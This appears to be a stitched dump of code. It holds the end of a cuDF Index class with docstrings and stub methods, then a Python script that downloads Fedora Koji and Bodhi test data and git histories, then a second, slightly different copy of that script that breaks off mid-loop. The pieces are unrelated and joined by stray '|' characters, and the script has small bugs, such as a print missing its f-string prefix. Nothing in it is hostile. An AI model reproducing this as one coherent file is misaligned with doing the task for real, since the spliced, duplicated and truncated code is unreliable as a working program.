>>> idx = cudf.Index([1, 2, 3, 4.0, np.nan])
>>> idx.is_numeric()
True
>>> idx = cudf.Index(["Apple", "cold"])
>>> idx.is_numeric()
False
"""
raise NotImplementedError
def is_boolean(self):
"""
Check if the Index only consists of booleans.
Returns
-------
bool
Whether or not the Index only consists of booleans.
See Also
--------
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([True, False, True])
>>> idx.is_boolean()
True
>>> idx = cudf.Index(["True", "False", "True"])
>>> idx.is_boolean()
False
>>> idx = cudf.Index([1, 2, 3])
>>> idx.is_boolean()
False
"""
raise NotImplementedError
def is_integer(self):
"""
Check if the Index only consists of integers.
Returns
-------
bool
Whether or not the Index only consists of integers.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx.is_integer()
True
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_integer()
False
>>> idx = cudf.Index(["Apple", "Mango", "Watermelon"])
>>> idx.is_integer()
False
"""
raise NotImplementedError
def is_floating(self):
"""
Check if the Index is a floating type.
The Index may consist of only floats, NaNs, or a mix of floats,
integers, or NaNs.
Returns
-------
bool
Whether or not the Index only consists of only consists
of floats, NaNs, or a mix of floats, integers, or NaNs.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_floating()
True
>>> idx = cudf.Index([1.0, 2.0, np.nan, 4.0])
>>> idx.is_floating()
True
>>> idx = cudf.Index([1, 2, 3, 4, np.nan], nan_as_null=False)
>>> idx.is_floating()
True
>>> idx = cudf.Index([1, 2, 3, 4])
>>> idx.is_floating()
False
"""
raise NotImplementedError
def is_object(self):
"""
Check if the Index is of the object dtype.
Returns
-------
bool
Whether or not the Index is of the object dtype.
See Also
--------
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_categorical : Check if the Index holds categorical data.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index(["Apple", "Mango", "Watermelon"])
>>> idx.is_object()
True
>>> idx = cudf.Index(["Watermelon", "Orange", "Apple",
... "Watermelon"]).astype("category")
>>> idx.is_object()
False
>>> idx = cudf.Index([1.0, 2.0, 3.0, 4.0])
>>> idx.is_object()
False
"""
raise NotImplementedError
def is_categorical(self):
"""
Check if the Index holds categorical data.
Returns
-------
bool
True if the Index is categorical.
See Also
--------
CategoricalIndex : Index for categorical data.
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_interval : Check if the Index holds Interval objects.
Examples
--------
>>> import cudf
>>> idx = cudf.Index(["Watermelon", "Orange", "Apple",
... "Watermelon"]).astype("category")
>>> idx.is_categorical()
True
>>> idx = cudf.Index([1, 3, 5, 7])
>>> idx.is_categorical()
False
>>> s = cudf.Series(["Peter", "Victor", "Elisabeth", "Mar"])
>>> s
0 Peter
1 Victor
2 Elisabeth
3 Mar
dtype: object
>>> s.index.is_categorical()
False
"""
raise NotImplementedError
def is_interval(self):
"""
Check if the Index holds Interval objects.
Returns
-------
bool
Whether or not the Index holds Interval objects.
See Also
--------
IntervalIndex : Index for Interval objects.
is_boolean : Check if the Index only consists of booleans.
is_integer : Check if the Index only consists of integers.
is_floating : Check if the Index is a floating type.
is_numeric : Check if the Index only consists of numeric data.
is_object : Check if the Index is of the object dtype.
is_categorical : Check if the Index holds categorical data.
Examples
--------
>>> import cudf
>>> import pandas as pd
>>> idx = cudf.from_pandas(
... pd.Index([pd.Interval(left=0, right=5),
... pd.Interval(left=5, right=10)])
... )
>>> idx.is_interval()
True
>>> idx = cudf.Index([1, 3, 5, 7])
>>> idx.is_interval()
False
"""
raise NotImplementedError
def _union(self, other, sort=None):
# TODO: As a future optimization we should explore
# not doing `to_frame`
self_df = self.to_frame(index=False, name=0)
other_df = other.to_frame(index=False, name=0)
self_df["order"] = self_df.index
other_df["order"] = other_df.index
res = self_df.merge(other_df, on=[0], how="outer")
res = res.sort_values(
by=res._data.to_pandas_index()[1:], ignore_index=True
)
union_result = cudf.core.index._index_from_data({0: res._data[0]})
if sort is None and len(other):
return union_result.sort_values()
return union_result
def _intersection(self, other, sort=None):
other_unique = other.unique()
other_unique.names = self.names
intersection_result = cudf.core.index._index_from_data(
cudf.DataFrame._from_data(self.unique()._data)
._merge(
cudf.DataFrame._from_data(other_unique._data),
how="inner",
on=self.name,
)
._data
)
if sort is None and len(other):
return intersection_result.sort_values()
return intersection_result
def sort_values(
self,
return_indexer=False,
ascending=True,
na_position="last",
key=None,
):
"""
Return a sorted copy of the index, and optionally return the indices
that sorted the index itself.
Parameters
----------
return_indexer : bool, default False
Should the indices that would sort the index be returned.
ascending : bool, default True
Should the index values be sorted in an ascending order.
na_position : {'first' or 'last'}, default 'last'
Argument 'first' puts NaNs at the beginning, 'last' puts NaNs at
the end.
key : None, optional
This parameter is NON-FUNCTIONAL.
Returns
-------
sorted_index : Index
Sorted copy of the index.
indexer : cupy.ndarray, optional
The indices that the index itself was sorted by.
See Also
--------
cudf.Series.min : Sort values of a Series.
cudf.DataFrame.sort_values : Sort values in a DataFrame.
Examples
--------
>>> import cudf
>>> idx = cudf.Index([10, 100, 1, 1000])
>>> idx
Int64Index([10, 100, 1, 1000], dtype='int64')
Sort values in ascending order (default behavior).
>>> idx.sort_values()
Int64Index([1, 10, 100, 1000], dtype='int64')
Sort values in descending order, and also get the indices `idx` was
sorted by.
>>> idx.sort_values(ascending=False, return_indexer=True)
(Int64Index([1000, 100, 10, 1], dtype='int64'), array([3, 1, 0, 2],
dtype=int32))
Sorting values in a MultiIndex:
>>> midx = cudf.MultiIndex(
... levels=[[1, 3, 4, -10], [1, 11, 5]],
... codes=[[0, 0, 1, 2, 3], [0, 2, 1, 1, 0]],
... names=["x", "y"],
... )
>>> midx
MultiIndex([( 1, 1),
( 1, 5),
( 3, 11),
( 4, 11),
(-10, 1)],
names=['x', 'y'])
>>> midx.sort_values()
MultiIndex([(-10, 1),
( 1, 1),
( 1, 5),
( 3, 11),
( 4, 11)],
names=['x', 'y'])
>>> midx.sort_values(ascending=False)
MultiIndex([( 4, 11),
( 3, 11),
( 1, 5),
( 1, 1),
(-10, 1)],
names=['x', 'y'])
"""
if key is not None:
raise NotImplementedError("key parameter is not yet implemented.")
if na_position not in {"first", "last"}:
raise ValueError(f"invalid na_position: {na_position}")
indices = self.argsort(ascending=ascending, na_position=na_position)
index_sorted = self.take(indices)
if return_indexer:
return index_sorted, indices
else:
return index_sorted
def unique(self):
"""
Return unique values in the index.
Returns
-------
Index without duplicates
"""
return cudf.core.index._index_from_data(
{self.name: self._values.unique()}, name=self.name
)
def join(
self, other, how="left", level=None, return_indexers=False, sort=False
):
"""
Compute join_index and indexers to conform data structures
to the new index.
Parameters
----------
other : Index.
how : {'left', 'right', 'inner', 'outer'}
return_indexers : bool, default False
sort : bool, default False
Sort the join keys lexicographically in the result Index. If False,
the order of the join keys depends on the join type (how keyword).
Returns: index
Examples
--------
>>> import cudf
>>> lhs = cudf.DataFrame({
... "a": [2, 3, 1],
... "b": [3, 4, 2],
... }).set_index(['a', 'b']).index
>>> lhs
MultiIndex([(2, 3),
(3, 4),
(1, 2)],
names=['a', 'b'])
>>> rhs = cudf.DataFrame({"a": [1, 4, 3]}).set_index('a').index
>>> rhs
Int64Index([1, 4, 3], dtype='int64', name='a')
>>> lhs.join(rhs, how='inner')
MultiIndex([(3, 4),
(1, 2)],
names=['a', 'b'])
"""
warnings.warn(
"Index.join is deprecated and will be removed", FutureWarning
)
if isinstance(self, cudf.MultiIndex) and isinstance(
other, cudf.MultiIndex
):
raise TypeError(
"Join on level between two MultiIndex objects is ambiguous"
)
if level is not None and not is_scalar(level):
raise ValueError("level should be an int or a label only")
if isinstance(other, cudf.MultiIndex):
if how == "left":
how = "right"
elif how == "right":
how = "left"
rhs = self.copy(deep=False)
lhs = other.copy(deep=False)
else:
lhs = self.copy(deep=False)
rhs = other.copy(deep=False)
on = level
# In case of MultiIndex, it will be None as
# we don't need to update name
left_names = lhs.names
right_names = rhs.names
# There should be no `None` values in Joined indices,
# so essentially it would be `left/right` or 'inner'
# in case of MultiIndex
if isinstance(lhs, cudf.MultiIndex):
if level is not None and isinstance(level, int):
on = lhs._data.select_by_index(level).names[0]
right_names = (on,) if on is not None else right_names
on = right_names[0]
if how == "outer":
how = "left"
elif how == "right":
how = "inner"
else:
# Both are normal indices
right_names = left_names
on = right_names[0]
lhs.names = left_names
rhs.names = right_names
output = lhs._merge(rhs, how=how, on=on, sort=sort)
return output
def rename(self, name, inplace=False):
"""
Alter Index name.
Defaults to returning new index.
Parameters
----------
name : label
Name(s) to set.
Returns
-------
Index
Examples
--------
>>> import cudf
>>> index = cudf.Index([1, 2, 3], name='one')
>>> index
Int64Index([1, 2, 3], dtype='int64', name='one')
>>> index.name
'one'
>>> renamed_index = index.rename('two')
>>> renamed_index
Int64Index([1, 2, 3], dtype='int64', name='two')
>>> renamed_index.name
'two'
"""
if inplace is True:
self.name = name
return None
else:
out = self.copy(deep=True)
out.name = name
return out
def to_series(self, index=None, name=None):
"""
Create a Series with both index and values equal to the index keys.
Useful with map for returning an indexer based on an index.
Parameters
----------
index : Index, optional
Index of resulting Series. If None, defaults to original index.
name : str, optional
Dame of resulting Series. If None, defaults to name of original
index.
Returns
-------
Series
The dtype will be based on the type of the Index values.
"""
return cudf.Series(
self._values,
index=self.copy(deep=False) if index is None else index,
name=self.name if name is None else name,
)
def get_slice_bound(self, label, side, kind=None):
"""
Calculate slice bound that corresponds to given label.
Returns leftmost (one-past-the-rightmost if ``side=='right'``) position
of given label.
Parameters
----------
label : object
side : {'left', 'right'}
kind : {'ix', 'loc', 'getitem'}
Returns
-------
int
Index of label.
"""
raise NotImplementedError
def __array_function__(self, func, types, args, kwargs):
# check if the function is implemented for the current type
cudf_index_module = type(self)
for submodule in func.__module__.split(".")[1:]:
# point cudf_index_module to the correct submodule
if hasattr(cudf_index_module, submodule):
cudf_index_module = getattr(cudf_index_module, submodule)
else:
return NotImplemented
fname = func.__name__
handled_types = [BaseIndex, cudf.Series]
# check if we don't handle any of the types (including sub-class)
for t in types:
if not any(
issubclass(t, handled_type) for handled_type in handled_types
):
return NotImplemented
if hasattr(cudf_index_module, fname):
cudf_func = getattr(cudf_index_module, fname)
# Handle case if cudf_func is same as numpy function
if cudf_func is func:
return NotImplemented
else:
return cudf_func(*args, **kwargs)
else:
return NotImplemented
def isin(self, values):
"""Return a boolean array where the index values are in values.
Compute boolean array of whether each index value is found in
the passed set of values. The length of the returned boolean
array matches the length of the index.
Parameters
----------
values : set, list-like, Index
Sought values.
Returns
-------
is_contained : cupy array
CuPy array of boolean values.
Examples
--------
>>> idx = cudf.Index([1,2,3])
>>> idx
Int64Index([1, 2, 3], dtype='int64')
Check whether each index value in a list of values.
>>> idx.isin([1, 4])
array([ True, False, False])
"""
# To match pandas behavior, even though only list-like objects are
# supposed to be passed, only scalars throw errors. Other types (like
# dicts) just transparently return False (see the implementation of
# ColumnBase.isin).
if is_scalar(values):
raise TypeError(
"only list-like objects are allowed to be passed "
f"to isin(), you passed a {type(values).__name__}"
)
return self._values.isin(values).values
@classmethod
def from_pandas(cls, index, nan_as_null=None):
"""
Convert from a Pandas Index.
Parameters
----------
index : Pandas Index object
A Pandas Index object which has to be converted
to cuDF Index.
nan_as_null : bool, Default None
If ``None``/``True``, converts ``np.nan`` values
to ``null`` values.
If ``False``, leaves ``np.nan`` values as is.
Raises
------
TypeError for invalid input type.
Examples
--------
>>> import cudf
>>> import pandas as pd
>>> import numpy as np
>>> data = [10, 20, 30, np.nan]
>>> pdi = pd.Index(data)
>>> cudf.Index.from_pandas(pdi)
Float64Index([10.0, 20.0, 30.0, <NA>], dtype='float64')
>>> cudf.Index.from_pandas(pdi, nan_as_null=False)
Float64Index([10.0, 20.0, 30.0, nan], dtype='float64')
"""
if not isinstance(index, pd.Index):
raise TypeError("not a pandas.Index")
ind = cudf.Index(column.as_column(index, nan_as_null=nan_as_null))
ind.name = index.name
return ind
@property
def _constructor_expanddim(self):
return cudf.MultiIndex
def drop_duplicates(
self,
keep="first",
nulls_are_equal=True,
):
"""
Drop duplicate rows in index.
keep : {"first", "last", False}, default "first"
- 'first' : Drop duplicates except for the first occurrence.
- 'last' : Drop duplicates except for the last occurrence.
- ``False`` : Drop all duplicates.
nulls_are_equal: bool, default True
Null elements are considered equal to other null elements.
"""
# This utilizes the fact that all `Index` is also a `Frame`.
# Except RangeIndex.
return self._from_columns_like_self(
drop_duplicates(
list(self._columns),
keys=range(len(self._data)),
keep=keep,
nulls_are_equal=nulls_are_equal,
),
self._column_names,
)
def dropna(self, how="any"):
"""
Drop null rows from Index.
how : {"any", "all"}, default "any"
Specifies how to decide whether to drop a row.
"any" (default) drops rows containing at least
one null value. "all" drops only rows containing
*all* null values.
"""
# This is to be consistent with IndexedFrame.dropna to handle nans
# as nulls by default
data_columns = [
col.nans_to_nulls()
if isinstance(col, cudf.core.column.NumericalColumn)
else col
for col in self._columns
]
return self._from_columns_like_self(
drop_nulls(
data_columns,
how=how,
keys=range(len(data_columns)),
),
self._column_names,
)
def _gather(self, gather_map, nullify=False, check_bounds=True):
"""Gather rows of index specified by indices in `gather_map`.
Skip bounds checking if check_bounds is False.
Set rows to null for all out of bound indices if nullify is `True`.
"""
gather_map = cudf.core.column.as_column(gather_map)
# TODO: For performance, the check and conversion of gather map should
# be done by the caller. This check will be removed in future release.
if not is_integer_dtype(gather_map.dtype):
gather_map = gather_map.astype("int32")
if not _gather_map_is_valid(
gather_map, len(self), check_bounds, nullify
):
raise IndexError("Gather map index is out of bounds.")
return self._from_columns_like_self(
gather(list(self._columns), gather_map, nullify=nullify),
self._column_names,
)
def take(self, indices, axis=0, allow_fill=True, fill_value=None):
"""Return a new index containing the rows specified by *indices*
Parameters
----------
indices : array-like
Array of ints indicating which positions to take.
axis : int
The axis over which to select values, always 0.
allow_fill : Unsupported
fill_value : Unsupported
Returns
-------
out : Index
New object with desired subset of rows.
Examples
--------
>>> idx = cudf.Index(['a', 'b', 'c', 'd', 'e'])
>>> idx.take([2, 0, 4, 3])
StringIndex(['c' 'a' 'e' 'd'], dtype='object')
"""
if axis not in {0, "index"}:
raise NotImplementedError(
"Gather along column axis is not yet supported."
)
if not allow_fill or fill_value is not None:
raise NotImplementedError(
"`allow_fill` and `fill_value` are unsupported."
)
return self._gather(indices)
def _apply_boolean_mask(self, boolean_mask):
"""Apply boolean mask to each row of `self`.
Rows corresponding to `False` is dropped.
"""
boolean_mask = cudf.core.column.as_column(boolean_mask)
if not is_bool_dtype(boolean_mask.dtype):
raise ValueError("boolean_mask is not boolean type.")
return self._from_columns_like_self(
apply_boolean_mask(list(self._columns), boolean_mask),
column_names=self._column_names,
)
def repeat(self, repeats, axis=None):
"""Repeat elements of a Index.
Returns a new Index where each element of the current Index is repeated
consecutively a given number of times.
Parameters
----------
repeats : int, or array of ints
The number of repetitions for each element. This should
be a non-negative integer. Repeating 0 times will return
an empty object.
Returns
-------
Index
A newly created object of same type as caller with repeated
elements.
Examples
--------
>>> index = cudf.Index([10, 22, 33, 55])
>>> index
Int64Index([10, 22, 33, 55], dtype='int64')
>>> index.repeat(5)
Int64Index([10, 10, 10, 10, 10, 22, 22, 22, 22, 22, 33,
33, 33, 33, 33, 55, 55, 55, 55, 55],
dtype='int64')
"""
raise NotImplementedError
def _split_columns_by_levels(self, levels):
if isinstance(levels, int) and levels > 0:
raise ValueError(f"Out of bound level: {levels}")
return (
[self._data[self.name]],
[],
["index" if self.name is None else self.name],
[],
)
def _split(self, splits):
raise NotImplementedError
def _get_result_name(left_name, right_name):
if left_name == right_name:
return left_name
else:
return None
|
#!/usr/bin/env python3
import gzip
import json
import os
import shutil
import subprocess
import sys
import tempfile
import click
import koji
import requests
# The data we use is meant to be a point-in-time snapshot of Fedora at this
# date; we sneak some newer things in below to test aspects that weren't
# in Fedora at that point. At some point, rebasing to a newer point-of-time
# could make sense.
DATE = "2019-02-06 00:00:00"
TAGS = ""
def show(msg, indent):
print(" " * indent + msg, file=sys.stderr)
def get_btype(build):
extra = build.get('extra')
if extra:
typeinfo = extra.get('typeinfo')
else:
typeinfo = None
if extra and extra.get('image'):
return 'image'
elif typeinfo and typeinfo.get('module'):
return 'module'
else:
return'rpm'
class Downloader:
def __init__(self, output, base):
self.output = output
self.base = base
self.base_update_info = {}
self.update_info = {}
self.build_id_to_nvr = {}
self.module_nvr_short_to_nvr = {}
self.image_packages = set()
if self.base:
self._load_build_ids(self.base)
self._load_update_info(self.base)
koji_config_file = os.path.join(os.path.dirname(__file__), '../koji.conf')
options = koji.read_config(profile_name='fedora', user_config=koji_config_file)
session_opts = koji.grab_session_options(options)
self.koji_session = koji.ClientSession(options['server'], session_opts)
def _check_existing(self, relative, *, indent=0):
dest = os.path.join(self.output, relative)
if os.path.exists(dest):
return True, dest
elif self.base and os.path.exists(os.path.join(self.base, relative)):
d = os.path.dirname(dest)
if not os.path.exists(d):
os.makedirs(d)
shutil.copy(os.path.join(self.base, relative), dest)
return True, dest
else:
return False, dest
def _load_build_ids(self, load_from):
for ent in os.scandir(os.path.join(load_from, 'builds')):
if ent.name.endswith('.json.gz'):
with gzip.open(ent.path, 'rt') as f:
build = json.load(f)
self.build_id_to_nvr[build['build_id']] = build['nvr']
if get_btype(build) == 'module':
n, v, r = build['nvr'].rsplit('-', 2)
nvr_short = n + '-' + v + '-' + r.split('.')[0]
self.module_nvr_short_to_nvr[nvr_short] = build['nvr']
def _load_update_info(self, load_from):
fname = os.path.join(load_from, 'updates.index.gz')
if os.path.exists(fname):
with gzip.open(fname, 'rt') as f:
self.base_update_info = json.load(f)
def save_update_info(self):
fname = os.path.join(self.output, 'updates.index.gz')
with gzip.open(fname, 'wt') as f:
json.dump(self.update_info, f, indent=4)
def create_directories(self):
if os.path.exists(self.output):
print(f"{self.output} already exists", file=sys.stderr)
os.mkdir(self.output)
os.mkdir(os.path.join(self.output, 'updates'))
os.mkdir(os.path.join(self.output, 'builds'))
os.mkdir(os.path.join(self.output, 'git'))
def download_build(self, *, nvr=None, build_id=None, indent=0):
if nvr is None and build_id is None:
raise RuntimeError("nvr or build_id must be specified")
if nvr is None:
nvr = self.build_id_to_nvr.get(build_id)
build = None
if nvr:
exists, output_file = self._check_existing(f'builds/{nvr}.json.gz')
if exists:
show(f"{nvr}: already downloaded", indent)
with gzip.open(output_file, 'rt') as f:
build = json.load(f)
else:
exists = False
if build is None:
if nvr:
build = self.koji_session.getBuild(nvr)
else:
build = self.koji_session.getBuild(build_id)
nvr = build['nvr']
show(f"{nvr}: downloaded", indent)
output_file = os.path.join(self.output, f'builds/{nvr}.json.gz')
self.build_id_to_nvr[build['build_id']] = build['nvr']
indent += 4
btype = get_btype(build)
if not exists:
if btype == 'image' or btype == 'module':
archives = self.koji_session.listArchives(build['id'])
build['archives'] = []
show("Listing archives", indent)
seen = set()
for archive in archives:
if btype == 'module':
if archive['filename'] not in ('modulemd.txt', 'modulemd.x86_64.txt'):
continue
build['archives'].append(archive)
show(f"Listing rpms for archive {archive["id"]}", indent)
components = self.koji_session.listRPMs(imageID=archive['id'])
archive['components'] = []
for c in components:
if c['arch'] not in ('x86_64', 'noarch'):
continue
archive['components'].append(c)
with gzip.open(output_file, 'wt') as f:
json.dump(build, f, indent=4)
# Now find extra builds to download
if btype == 'image' or btype == 'module':
seen = set()
for archive in build['archives']:
for c in archive['components']:
if not c['build_id'] in seen:
seen.add(c['build_id'])
nvr = self.download_build(build_id=c['build_id'], indent=indent)
if btype == 'image':
self.image_packages.add(nvr.rsplit('-', 2)[0])
if btype == 'image':
for m in build['extra']['image']['modules']:
if m in self.module_nvr_short_to_nvr:
self.download_build(nvr=self.module_nvr_short_to_nvr[m], indent=indent)
else:
module_name = m.rsplit('-', 2)[0]
package_id = self.koji_session.getPackageID(module_name)
for module_build in self.koji_session.listBuilds(type='module',
packageID=package_id):
if module_build['nvr'].startswith(m):
self.download_build(nvr=module_build['nvr'], indent=indent + 4)
return nvr
def download_tag_data(self, indent=0):
self.tagged_packages = {}
for tag in ['f28', 'f29']:
exists, output_file = self._check_existing(f'tags/{tag}.json.gz')
if not exists:
show(f'Downloading tag history for {tag}', indent=indent)
result = self.koji_session.queryHistory(tables=['tag_listing'], tag=tag)
filtered_result = [r
for r in result['tag_listing']
if r['name'] in self.image_packages]
d = os.path.dirname(output_file)
if not os.path.exists(d):
os.makedirs(d)
with gzip.open(output_file, 'wt') as f:
json.dump(filtered_result, f, indent=4)
else:
show(f'Using existing tag history for {tag}', indent=indent)
with gzip.open(output_file, 'rt') as f:
filtered_result = json.load(f)
indent += 4
for r in filtered_result:
self.download_build(nvr=f"{r["name"]}-{r["version"]}-{r["release"]}",
indent=indent + 4)
def download_package_details(self, *, indent=0):
for package in sorted(self.image_packages):
self.download_updates('rpm', package, indent=indent)
self.dump_git(os.path.join('rpms', package), indent=indent + 4)
def download_updates(self, content_type, package, *, releases=None, date=DATE, indent=0):
key = f"{content_type}/{package}"
if (key in self.update_info or
(key in self.base_update_info and
self.base_update_info[key]['date'] == date)):
show(f"{key}: already downloaded updates", indent)
if key not in self.update_info:
self.update_info[key] = self.base_update_info[key]
for update in self.update_info[key]['updates']:
src = os.path.join(self.base, 'updates', update + '.json.gz')
dest = os.path.join(self.output, 'updates', update + '.json.gz')
shutil.copy(src, dest)
with gzip.open(src, 'rt') as f:
r = json.load(f)
for b in r['builds']:
build_name = b['nvr'].rsplit('-', 2)[0]
if build_name == package:
self.download_build(nvr=b['nvr'], indent=indent + 4)
return
show(f"{key}: downloading updates", indent)
if releases is None:
if content_type == 'flatpak':
releases = ['F29F']
elif content_type == 'rpm':
releases = ['F28', 'F29']
url = "https://bodhi.fedoraproject.org/updates/"
params = {
'page': 1,
'rows_per_page': 100,
'content_type': content_type,
'packages': package,
'releases': releases,
'submitted_before': date,
}
response = requests.get(url,
headers={'Accept': 'application/json'},
params=params)
response.raise_for_status()
response_json = response.json()
self.update_info[key] = {
'date': date,
'updates': []
}
for r in response_json['updates']:
if ' ' in r['title']:
update_name = r['updateid']
else:
update_name = r['title']
output_file = os.path.join(self.output, 'updates', update_name + '.json.gz')
with gzip.open(output_file, 'wt') as f:
json.dump(r, f, indent=4)
self.update_info[key]['updates'].append(update_name)
if r['status'] in ('pending', 'testing'):
print("Error: {update_name} status is {r['status']}", file=sys.stderr)
sys.exit(1)
for b in r['builds']:
build_name = b['nvr'].rsplit('-', 2)[0]
if build_name == package:
self.download_build(nvr=b['nvr'], indent=indent + 4)
def do_dump_git(self, tempdir, output_file, pkg):
subprocess.check_call(['git', 'clone', '--mirror',
'https://src.fedoraproject.org/' + pkg + '.git'],
cwd=tempdir)
repodir = os.path.join(tempdir, os.path.basename(pkg) + '.git')
result = {}
branches = subprocess.check_output(['git', 'branch', '-a', '--format=%(refname:lstrip=2)'],
cwd=repodir, encoding='UTF-8').strip().split('\n')
for branch in branches:
commits = subprocess.check_output(['git', 'log', '--format=%H', branch],
cwd=repodir, encoding='UTF-8').strip().split('\n')
result[branch] = commits
d = os.path.dirname(output_file)
if not os.path.exists(d):
os.makedirs(d)
with gzip.open(output_file, 'wt') as f:
json.dump(result, f, indent=4)
def dump_git(self, pkg, *, indent=0):
exists, output_file = self._check_existing(f'git/{pkg}.json.gz')
if exists:
show(f"{pkg}.git: already downloaded", indent)
return
show(f"{pkg}.git: downloading", indent)
tempdir = tempfile.mkdtemp()
try:
self.do_dump_git(tempdir, output_file, pkg)
finally:
shutil.rmtree(tempdir)
@click.command()
@click.option('-o', '--output', required=True,
help='Output directory')
@click.option('-b', '--base',
help='Reference directory')
def main(output, base):
"""Download test data"""
downloader = Downloader(output, base)
downloader.create_directories()
downloader.download_updates('flatpak', 'feedreader')
downloader.download_updates('flatpak', 'eog')
downloader.download_updates('flatpak', 'quadrapassel')
downloader.download_build(nvr='eog-master-20180821163756.2')
# These rpm builds are used when testing modification of Bodhi updates
for b in (["aisleriot-3.22.5-1.fc28",
"aisleriot-3.22.6-1.fc29",
"aisleriot-3.22.7-1.fc29",
"bijiben-3.28.1-1.fc28",
"bijiben-3.28.2-1.fc28",
"bijiben-3.30.0-1.fc29",
"bijiben-3.30.1-1.fc29",
"bijiben-3.30.2-1.fc29"]):
downloader.download_build(nvr=b)
# There is a F30 update including gnome-clocks and gnome-weather, use this
# to test multi-Flatpak updates
downloader.download_updates('flatpak', 'gnome-clocks',
releases=['F30F'], date="2019-08-01 00:00:00")
downloader.download_updates('flatpak', 'gnome-weather',
releases=['F30F'], date="2019-08-01 00:00:00")
# A more recent Flatpak with labels
downloader.download_updates('flatpak', 'baobab',
releases=['F32F'], date="2020-08-15 00:00:00")
# Module with multiple contexts
downloader.download_build(nvr='django-1.6-20180828135711.9c690d0e')
downloader.download_build(nvr='django-1.6-20180828135711.a5b0195c')
downloader.download_tag_data()
downloader.download_package_details()
downloader.save_update_info()
if __name__ == '__main__':
main()
| #!/usr/bin/env python3
import gzip
import json
import os
import shutil
import subprocess
import sys
import tempfile
import click
import koji
import requests
# The data we use is meant to be a point-in-time snapshot of Fedora at this
# date; we sneak some newer things in below to test aspects that weren't
# in Fedora at that point. At some point, rebasing to a newer point-of-time
# could make sense.
DATE = "2019-02-06 00:00:00"
TAGS = ""
def show(msg, indent):
print(" " * indent + msg, file=sys.stderr)
def get_btype(build):
extra = build.get('extra')
if extra:
typeinfo = extra.get('typeinfo')
else:
typeinfo = None
if extra and extra.get('image'):
return 'image'
elif typeinfo and typeinfo.get('module'):
return 'module'
else:
return'rpm'
class Downloader:
def __init__(self, output, base):
self.output = output
self.base = base
self.base_update_info = {}
self.update_info = {}
self.build_id_to_nvr = {}
self.module_nvr_short_to_nvr = {}
self.image_packages = set()
if self.base:
self._load_build_ids(self.base)
self._load_update_info(self.base)
koji_config_file = os.path.join(os.path.dirname(__file__), '../koji.conf')
options = koji.read_config(profile_name='fedora', user_config=koji_config_file)
session_opts = koji.grab_session_options(options)
self.koji_session = koji.ClientSession(options['server'], session_opts)
def _check_existing(self, relative, *, indent=0):
dest = os.path.join(self.output, relative)
if os.path.exists(dest):
return True, dest
elif self.base and os.path.exists(os.path.join(self.base, relative)):
d = os.path.dirname(dest)
if not os.path.exists(d):
os.makedirs(d)
shutil.copy(os.path.join(self.base, relative), dest)
return True, dest
else:
return False, dest
def _load_build_ids(self, load_from):
for ent in os.scandir(os.path.join(load_from, 'builds')):
if ent.name.endswith('.json.gz'):
with gzip.open(ent.path, 'rt') as f:
build = json.load(f)
self.build_id_to_nvr[build['build_id']] = build['nvr']
if get_btype(build) == 'module':
n, v, r = build['nvr'].rsplit('-', 2)
nvr_short = n + '-' + v + '-' + r.split('.')[0]
self.module_nvr_short_to_nvr[nvr_short] = build['nvr']
def _load_update_info(self, load_from):
fname = os.path.join(load_from, 'updates.index.gz')
if os.path.exists(fname):
with gzip.open(fname, 'rt') as f:
self.base_update_info = json.load(f)
def save_update_info(self):
fname = os.path.join(self.output, 'updates.index.gz')
with gzip.open(fname, 'wt') as f:
json.dump(self.update_info, f, indent=4)
def create_directories(self):
if os.path.exists(self.output):
print(f"{self.output} already exists", file=sys.stderr)
os.mkdir(self.output)
os.mkdir(os.path.join(self.output, 'updates'))
os.mkdir(os.path.join(self.output, 'builds'))
os.mkdir(os.path.join(self.output, 'git'))
def download_build(self, *, nvr=None, build_id=None, indent=0):
if nvr is None and build_id is None:
raise RuntimeError("nvr or build_id must be specified")
if nvr is None:
nvr = self.build_id_to_nvr.get(build_id)
build = None
if nvr:
exists, output_file = self._check_existing(f'builds/{nvr}.json.gz')
if exists:
show(f"{nvr}: already downloaded", indent)
with gzip.open(output_file, 'rt') as f:
build = json.load(f)
else:
exists = False
if build is None:
if nvr:
build = self.koji_session.getBuild(nvr)
else:
build = self.koji_session.getBuild(build_id)
nvr = build['nvr']
show(f"{nvr}: downloaded", indent)
output_file = os.path.join(self.output, f'builds/{nvr}.json.gz')
self.build_id_to_nvr[build['build_id']] = build['nvr']
indent += 4
btype = get_btype(build)
if not exists:
if btype == 'image' or btype == 'module':
archives = self.koji_session.listArchives(build['id'])
build['archives'] = []
show("Listing archives", indent)
seen = set()
for archive in archives:
if btype == 'module':
if archive['filename'] not in ('modulemd.txt', 'modulemd.x86_64.txt'):
continue
build['archives'].append(archive)
show(f"Listing rpms for archive {archive['id']}", indent)
components = self.koji_session.listRPMs(imageID=archive['id'])
archive['components'] = []
for c in components:
if c['arch'] not in ('x86_64', 'noarch'):
continue
archive['components'].append(c)
with gzip.open(output_file, 'wt') as f:
json.dump(build, f, indent=4)
# Now find extra builds to download
if btype == 'image' or btype == 'module':
seen = set()
for archive in build['archives']:
for c in archive['components']:
if not c['build_id'] in seen:
seen.add(c['build_id'])
